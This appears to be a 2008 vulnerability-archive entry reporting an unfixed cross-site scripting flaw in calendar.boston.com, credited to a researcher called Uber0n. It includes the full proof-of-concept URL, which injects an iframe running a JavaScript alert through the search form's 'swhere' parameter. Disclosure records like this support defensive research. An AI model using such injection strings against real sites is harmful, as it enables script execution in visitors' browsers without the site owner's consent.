Security researcher Uber0n, has submitted on 07/07/2008 a cross-site-scripting (XSS) vulnerability affecting calendar.boston.com, which at the time of submission ranked 693 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 08/07/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 07/07/2008 |
Date published: 08/07/2008 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: Uber0n |
Domain: calendar.boston.com |
Category: XSS |
Pagerank: 693 |
|---|
URL: http://calendar.boston.com/search?st=event&srss=10&swhat=&svt=text&swhere=%22%3E%27%3E%3Ciframe%20sr
c=javascript:alert(123)%3E&srad=60&swhen=&sort=0&trim=1&cat=80&p12=search_hp_find_events |
|
Click here to view the mirror
|
|
|
| 
